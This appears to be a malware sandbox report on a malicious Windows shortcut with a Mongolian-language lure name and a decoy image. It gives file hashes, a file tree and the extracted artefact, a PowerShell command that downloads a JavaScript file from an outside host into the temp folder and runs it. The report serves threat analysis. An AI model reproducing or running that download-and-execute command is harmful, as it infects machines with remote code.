Characteristics
| Hash | Hash Value |
|---|---|
| MD5 | 8cecabbb0f7555afaa302e89e5fcbf5e |
| Sha1 | b9729934cc92f0b1ff9a87f70637e6adfaf416b2 |
| Sha256 | 4a0e2649f89e11121ffe55546ee081ac07472db650d094314414ebf26fcb7a8e |
| Sha384 | affa1093e3f807a14cbcd1810fe2d35f2ad57c1e770deff7c8cfe3a9bd57ab4cf6081eb6903b156845d83f75ebfe9508 |
| Sha512 | 77be67752306b1b597c16980783637a336b9a9d1b0f1ae28caf9e845396ece90ecb54b2b2287096dd2bbab1f26179da87e9bf2b88a5de2abff68d0f58a55a952 |
| SSDeep | 3072:s+mII23WU02AvjKmaqnQgjzIrrhlLAKleh7l3vP9FRcHC:s+lAKePIrHWhB339Ff |
| TLSH | D5E31239F9C13357EDC508CA13D194D6592C7899702B62139CFAE54E9D3E8AA38B4C4F |
File Structure
- 8cecabbb0f7555afaa302e89e5fcbf5e (Malicious)
- Хятад улстай хамтын ажиллагаагаа өргөжүүлж байна.lnk (Malicious)
- [Lnk Summary] (Malicious)
- Мон-Атом ХХК.jpg
- Мон-Атом ХХК.jpg-preview.png
Artefacts
| Name | Value |
|---|---|
| LNK: Command Execution | `powershell.exe "cd $ENV:Temp;$f=$ENV:Temp+'\f.js';Invoke-WebRequest 'https://filebulldogs.com/uploads/F1OQY9GU84/f.js' -OutFile $f;./f.js;"` |
8cecabbb0f7555afaa302e89e5fcbf5e (152.02 KB)
Characteristics
No malware configuration was found at this point.
Artefacts
| Name | Value | Location |
|---|---|---|
| LNK: Command Execution | `powershell.exe "cd $ENV:Temp;$f=$ENV:Temp+'\f.js';Invoke-WebRequest 'https://filebulldogs.com/uploads/F1OQY9GU84/f.js' -OutFile $f;./f.js;"` (Malicious) | 8cecabbb0f7555afaa302e89e5fcbf5e > Хятад улстай хамтын ажиллагаагаа өргөжүүлж байна.lnk |